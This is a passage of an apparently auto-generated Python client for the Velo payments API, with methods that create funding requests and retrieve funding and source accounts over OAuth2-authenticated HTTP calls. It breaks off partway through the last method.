def create_ach_funding_request_with_http_info(self, source_account_id, funding_request_v1, **kwargs): # noqa: E501
"""Create Funding Request # noqa: E501
Instruct a funding request to transfer funds from the payor’s funding bank to the payor’s balance held within Velo. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_ach_funding_request_with_http_info(source_account_id, funding_request_v1, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str source_account_id: Source account id (required)
:param FundingRequestV1 funding_request_v1: Body to include the amount to be funded (required)
:param _return_http_data_only: response data without the HTTP status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: None
If the method is called asynchronously,
returns the request thread.
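As an illustration of how call_api expands the resource path from path_params (a sketch only; the real client also URL-encodes values, and the account id below is a made-up example):

```python
# Sketch of {placeholder} expansion for a resource path; the generated code
# passes path_params such as {'sourceAccountId': source_account_id}.
def expand_path(template, path_params):
    for name, value in path_params.items():
        template = template.replace("{" + name + "}", str(value))
    return template

print(expand_path(
    "/v1/sourceAccounts/{sourceAccountId}/achFundingRequest",
    {"sourceAccountId": "9a74a39e-0b22-44f9-87c5-92406e3bd0f7"},
))
```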
"""
local_var_params = locals()
all_params = ['source_account_id', 'funding_request_v1'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method create_ach_funding_request" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'source_account_id' is set
if ('source_account_id' not in local_var_params or
local_var_params['source_account_id'] is None):
raise ApiValueError("Missing the required parameter `source_account_id` when calling `create_ach_funding_request`") # noqa: E501
# verify the required parameter 'funding_request_v1' is set
if ('funding_request_v1' not in local_var_params or
local_var_params['funding_request_v1'] is None):
raise ApiValueError("Missing the required parameter `funding_request_v1` when calling `create_ach_funding_request`") # noqa: E501
collection_formats = {}
path_params = {}
if 'source_account_id' in local_var_params:
path_params['sourceAccountId'] = local_var_params['source_account_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'funding_request_v1' in local_var_params:
body_params = local_var_params['funding_request_v1']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['OAuth2'] # noqa: E501
return self.api_client.call_api(
'/v1/sourceAccounts/{sourceAccountId}/achFundingRequest', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def create_funding_request(self, source_account_id, funding_request_v2, **kwargs): # noqa: E501
"""Create Funding Request # noqa: E501
Instruct a funding request to transfer funds from the payor’s funding bank to the payor’s balance held within Velo (202 - accepted, 400 - invalid request body, 404 - source account not found). # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_funding_request(source_account_id, funding_request_v2, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str source_account_id: Source account id (required)
:param FundingRequestV2 funding_request_v2: Body to include the amount to be funded (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.create_funding_request_with_http_info(source_account_id, funding_request_v2, **kwargs) # noqa: E501
def create_funding_request_with_http_info(self, source_account_id, funding_request_v2, **kwargs): # noqa: E501
"""Create Funding Request # noqa: E501
Instruct a funding request to transfer funds from the payor’s funding bank to the payor’s balance held within Velo (202 - accepted, 400 - invalid request body, 404 - source account not found). # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_funding_request_with_http_info(source_account_id, funding_request_v2, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str source_account_id: Source account id (required)
:param FundingRequestV2 funding_request_v2: Body to include the amount to be funded (required)
:param _return_http_data_only: response data without the HTTP status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: None
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['source_account_id', 'funding_request_v2'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method create_funding_request" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'source_account_id' is set
if ('source_account_id' not in local_var_params or
local_var_params['source_account_id'] is None):
raise ApiValueError("Missing the required parameter `source_account_id` when calling `create_funding_request`") # noqa: E501
# verify the required parameter 'funding_request_v2' is set
if ('funding_request_v2' not in local_var_params or
local_var_params['funding_request_v2'] is None):
raise ApiValueError("Missing the required parameter `funding_request_v2` when calling `create_funding_request`") # noqa: E501
collection_formats = {}
path_params = {}
if 'source_account_id' in local_var_params:
path_params['sourceAccountId'] = local_var_params['source_account_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'funding_request_v2' in local_var_params:
body_params = local_var_params['funding_request_v2']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['OAuth2'] # noqa: E501
return self.api_client.call_api(
'/v2/sourceAccounts/{sourceAccountId}/fundingRequest', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def create_funding_request_v3(self, source_account_id, funding_request_v3, **kwargs): # noqa: E501
"""Create Funding Request # noqa: E501
Instruct a funding request to transfer funds from the payor’s funding bank to the payor’s balance held within Velo (202 - accepted, 400 - invalid request body, 404 - source account not found). # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_funding_request_v3(source_account_id, funding_request_v3, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str source_account_id: Source account id (required)
:param FundingRequestV3 funding_request_v3: Body to include the amount to be funded (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.create_funding_request_v3_with_http_info(source_account_id, funding_request_v3, **kwargs) # noqa: E501
def create_funding_request_v3_with_http_info(self, source_account_id, funding_request_v3, **kwargs): # noqa: E501
"""Create Funding Request # noqa: E501
Instruct a funding request to transfer funds from the payor’s funding bank to the payor’s balance held within Velo (202 - accepted, 400 - invalid request body, 404 - source account not found). # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_funding_request_v3_with_http_info(source_account_id, funding_request_v3, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str source_account_id: Source account id (required)
:param FundingRequestV3 funding_request_v3: Body to include the amount to be funded (required)
:param _return_http_data_only: response data without the HTTP status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: None
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['source_account_id', 'funding_request_v3'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method create_funding_request_v3" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'source_account_id' is set
if ('source_account_id' not in local_var_params or
local_var_params['source_account_id'] is None):
raise ApiValueError("Missing the required parameter `source_account_id` when calling `create_funding_request_v3`") # noqa: E501
# verify the required parameter 'funding_request_v3' is set
if ('funding_request_v3' not in local_var_params or
local_var_params['funding_request_v3'] is None):
raise ApiValueError("Missing the required parameter `funding_request_v3` when calling `create_funding_request_v3`") # noqa: E501
collection_formats = {}
path_params = {}
if 'source_account_id' in local_var_params:
path_params['sourceAccountId'] = local_var_params['source_account_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'funding_request_v3' in local_var_params:
body_params = local_var_params['funding_request_v3']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['OAuth2'] # noqa: E501
return self.api_client.call_api(
'/v3/sourceAccounts/{sourceAccountId}/fundingRequest', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def get_funding_account(self, funding_account_id, **kwargs): # noqa: E501
"""Get Funding Account # noqa: E501
Get Funding Account by ID # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_funding_account(funding_account_id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str funding_account_id: (required)
:param bool sensitive:
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: FundingAccountResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.get_funding_account_with_http_info(funding_account_id, **kwargs) # noqa: E501
def get_funding_account_with_http_info(self, funding_account_id, **kwargs): # noqa: E501
"""Get Funding Account # noqa: E501
Get Funding Account by ID # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_funding_account_with_http_info(funding_account_id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str funding_account_id: (required)
:param bool sensitive:
:param _return_http_data_only: response data without the HTTP status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(FundingAccountResponse, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
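A small sketch of how the optional sensitive flag becomes a query parameter; the generated code assembles query parameters as a list of (name, value) tuples:

```python
# Illustrative only: mirrors how the generated method turns optional keyword
# arguments into (name, value) query-parameter tuples.
def build_query_params(local_var_params):
    query_params = []
    if 'sensitive' in local_var_params:
        query_params.append(('sensitive', local_var_params['sensitive']))
    return query_params

print(build_query_params({'sensitive': True}))
print(build_query_params({}))
```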
"""
local_var_params = locals()
all_params = ['funding_account_id', 'sensitive'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method get_funding_account" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'funding_account_id' is set
if ('funding_account_id' not in local_var_params or
local_var_params['funding_account_id'] is None):
raise ApiValueError("Missing the required parameter `funding_account_id` when calling `get_funding_account`") # noqa: E501
collection_formats = {}
path_params = {}
if 'funding_account_id' in local_var_params:
path_params['fundingAccountId'] = local_var_params['funding_account_id'] # noqa: E501
query_params = []
if 'sensitive' in local_var_params:
query_params.append(('sensitive', local_var_params['sensitive'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['OAuth2'] # noqa: E501
return self.api_client.call_api(
'/v1/fundingAccounts/{fundingAccountId}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='FundingAccountResponse', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
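# Example (illustrative sketch, not part of the generated client; assumes an
# authenticated instance of this API class named `api` and a valid
# funding_account_id):
#
#     response = api.get_funding_account(funding_account_id, sensitive=False)
#     data, status, headers = api.get_funding_account_with_http_info(
#         funding_account_id)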
def get_funding_account_v2(self, funding_account_id, **kwargs): # noqa: E501
"""Get Funding Account # noqa: E501
Get Funding Account by ID # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_funding_account_v2(funding_account_id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str funding_account_id: (required)
:param bool sensitive:
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If a single
number is provided, it will be the total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: FundingAccountResponse2
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.get_funding_account_v2_with_http_info(funding_account_id, **kwargs) # noqa: E501
def get_funding_account_v2_with_http_info(self, funding_account_id, **kwargs): # noqa: E501
"""Get Funding Account # noqa: E501
Get Funding Account by ID # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_funding_account_v2_with_http_info(funding_account_id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str funding_account_id: (required)
:param bool sensitive:
:param _return_http_data_only: return the response data only, without
the status code and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If a single
number is provided, it will be the total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(FundingAccountResponse2, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['funding_account_id', 'sensitive'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method get_funding_account_v2" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'funding_account_id' is set
if ('funding_account_id' not in local_var_params or
local_var_params['funding_account_id'] is None):
raise ApiValueError("Missing the required parameter `funding_account_id` when calling `get_funding_account_v2`") # noqa: E501
collection_formats = {}
path_params = {}
if 'funding_account_id' in local_var_params:
path_params['fundingAccountId'] = local_var_params['funding_account_id'] # noqa: E501
query_params = []
if 'sensitive' in local_var_params:
query_params.append(('sensitive', local_var_params['sensitive'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['OAuth2'] # noqa: E501
return self.api_client.call_api(
'/v2/fundingAccounts/{fundingAccountId}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='FundingAccountResponse2', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def get_funding_accounts(self, **kwargs): # noqa: E501
"""Get Funding Accounts # noqa: E501
Get the funding accounts. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_funding_accounts(async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str payor_id:
:param str source_account_id:
:param int page: Page number. Default is 1.
:param int page_size: The number of results to return in a page (between 1 and 100)
:param str sort: List of sort fields, e.g. ?sort=accountName:asc,name:asc. Default is accountName:asc. The supported sort fields are accountName, name and currency.
:param bool sensitive:
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If a single
number is provided, it will be the total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: ListFundingAccountsResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.get_funding_accounts_with_http_info(**kwargs) # noqa: E501
def get_funding_accounts_with_http_info(self, **kwargs): # noqa: E501
"""Get Funding Accounts # noqa: E501
Get the funding accounts. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_funding_accounts_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str payor_id:
:param str source_account_id:
:param int page: Page number. Default is 1.
:param int page_size: The number of results to return in a page (between 1 and 100)
:param str sort: List of sort fields, e.g. ?sort=accountName:asc,name:asc. Default is accountName:asc. The supported sort fields are accountName, name and currency.
:param bool sensitive:
:param _return_http_data_only: return the response data only, without
the status code and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If a single
number is provided, it will be the total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(ListFundingAccountsResponse, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['payor_id', 'source_account_id', 'page', 'page_size', 'sort', 'sensitive'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method get_funding_accounts" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
if 'page_size' in local_var_params and local_var_params['page_size'] > 100: # noqa: E501
raise ApiValueError("Invalid value for parameter `page_size` when calling `get_funding_accounts`, must be a value less than or equal to `100`") # noqa: E501
if 'page_size' in local_var_params and local_var_params['page_size'] < 1: # noqa: E501
raise ApiValueError("Invalid value for parameter `page_size` when calling `get_funding_accounts`, must be a value greater than or equal to `1`") # noqa: E501
# note: the generated pattern `[a-zA-Z]+[:desc|:asc]` was a character class where
# alternation was intended; `:(desc|asc)` matches the documented sort syntax
if 'sort' in local_var_params and not re.search(r'[a-zA-Z]+:(desc|asc)', local_var_params['sort']): # noqa: E501
raise ApiValueError("Invalid value for parameter `sort` when calling `get_funding_accounts`, must conform to the pattern `/[a-zA-Z]+:(desc|asc)/`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
if 'payor_id' in local_var_params:
query_params.append(('payorId', local_var_params['payor_id'])) # noqa: E501
if 'source_account_id' in local_var_params:
query_params.append(('sourceAccountId', local_var_params['source_account_id'])) # noqa: E501
if 'page' in local_var_params:
query_params.append(('page', local_var_params['page'])) # noqa: E501
if 'page_size' in local_var_params:
query_params.append(('pageSize', local_var_params['page_size'])) # noqa: E501
if 'sort' in local_var_params:
query_params.append(('sort', local_var_params['sort'])) # noqa: E501
if 'sensitive' in local_var_params:
query_params.append(('sensitive', local_var_params['sensitive'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['OAuth2'] # noqa: E501
return self.api_client.call_api(
'/v1/fundingAccounts', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ListFundingAccountsResponse', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
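# Example (illustrative sketch; assumes an authenticated instance of this API
# class named `api`; parameter values are hypothetical):
#
#     listing = api.get_funding_accounts(page=1, page_size=100,
#                                        sort='accountName:asc')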
def get_funding_accounts_v2(self, **kwargs): # noqa: E501
"""Get Funding Accounts # noqa: E501
Get the funding accounts. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_funding_accounts_v2(async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str payor_id:
:param str name: The descriptive funding account name
:param str country: The 2 letter ISO 3166-1 country code (upper case)
:param str currency: The ISO 4217 currency code
:param FundingAccountType type: The type of funding account.
:param int page: Page number. Default is 1.
:param int page_size: The number of results to return in a page (between 1 and 100)
:param str sort: List of sort fields, e.g. ?sort=accountName:asc,name:asc. Default is accountName:asc. The supported sort fields are accountName and name.
:param bool sensitive:
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If a single
number is provided, it will be the total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: ListFundingAccountsResponse2
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.get_funding_accounts_v2_with_http_info(**kwargs) # noqa: E501
def get_funding_accounts_v2_with_http_info(self, **kwargs): # noqa: E501
"""Get Funding Accounts # noqa: E501
Get the funding accounts. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_funding_accounts_v2_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str payor_id:
:param str name: The descriptive funding account name
:param str country: The 2 letter ISO 3166-1 country code (upper case)
:param str currency: The ISO 4217 currency code
:param FundingAccountType type: The type of funding account.
:param int page: Page number. Default is 1.
:param int page_size: The number of results to return in a page (between 1 and 100)
:param str sort: List of sort fields, e.g. ?sort=accountName:asc,name:asc. Default is accountName:asc. The supported sort fields are accountName and name.
:param bool sensitive:
:param _return_http_data_only: return the response data only, without
the status code and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If a single
number is provided, it will be the total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(ListFundingAccountsResponse2, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['payor_id', 'name', 'country', 'currency', 'type', 'page', 'page_size', 'sort', 'sensitive'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method get_funding_accounts_v2" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
if 'page_size' in local_var_params and local_var_params['page_size'] > 100: # noqa: E501
raise ApiValueError("Invalid value for parameter `page_size` when calling `get_funding_accounts_v2`, must be a value less than or equal to `100`") # noqa: E501
if 'page_size' in local_var_params and local_var_params['page_size'] < 1: # noqa: E501
raise ApiValueError("Invalid value for parameter `page_size` when calling `get_funding_accounts_v2`, must be a value greater than or equal to `1`") # noqa: E501
# note: the generated pattern `[a-zA-Z]+[:desc|:asc]` was a character class where
# alternation was intended; `:(desc|asc)` matches the documented sort syntax
if 'sort' in local_var_params and not re.search(r'[a-zA-Z]+:(desc|asc)', local_var_params['sort']): # noqa: E501
raise ApiValueError("Invalid value for parameter `sort` when calling `get_funding_accounts_v2`, must conform to the pattern `/[a-zA-Z]+:(desc|asc)/`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
if 'payor_id' in local_var_params:
query_params.append(('payorId', local_var_params['payor_id'])) # noqa: E501
if 'name' in local_var_params:
query_params.append(('name', local_var_params['name'])) # noqa: E501
if 'country' in local_var_params:
query_params.append(('country', local_var_params['country'])) # noqa: E501
if 'currency' in local_var_params:
query_params.append(('currency', local_var_params['currency'])) # noqa: E501
if 'type' in local_var_params:
query_params.append(('type', local_var_params['type'])) # noqa: E501
if 'page' in local_var_params:
query_params.append(('page', local_var_params['page'])) # noqa: E501
if 'page_size' in local_var_params:
query_params.append(('pageSize', local_var_params['page_size'])) # noqa: E501
if 'sort' in local_var_params:
query_params.append(('sort', local_var_params['sort'])) # noqa: E501
if 'sensitive' in local_var_params:
query_params.append(('sensitive', local_var_params['sensitive'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['OAuth2'] # noqa: E501
return self.api_client.call_api(
'/v2/fundingAccounts', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ListFundingAccountsResponse2', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def get_source_account(self, source_account_id, **kwargs): # noqa: E501
"""Get details about given source account. # noqa: E501
Get details about given source account. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_source_account(source_account_id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str source_account_id: Source account id (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If a single
number is provided, it will be the total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: SourceAccountResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.get_source_account_with_http_info(source_account_id, **kwargs) # noqa: E501
def get_source_account_with_http_info(self, source_account_id, **kwargs): # noqa: E501
"""Get details about given source account. # noqa: E501
Get details about given source account. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_source_account_with_http_info(source_account_id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param str source_account_id: Source account id (required)
:param _return_http_data_only: return the response data only, without
the status code and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If a single
number is provided, it will be the total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(SourceAccountResponse, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['source_account_id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method get_source_account" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'source_account_id' is set
if ('source_account_id' not in local_var_params or
local_var_params['source_account_id'] is None):
raise ApiValueError("Missing the required parameter `source_account_id` when calling `get_source_account`") # noqa: E501
collection_formats = {}
path_params = {}
if 'source_account_id' in local_var_params:
path_params['sourceAccountId'] = local_var_params['source_account_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['OAuth2'] # noqa: E501
return self.api_client.call_api(
'/v1/sourceAccounts/{sourceAccountId}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='SourceAccountResponse', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
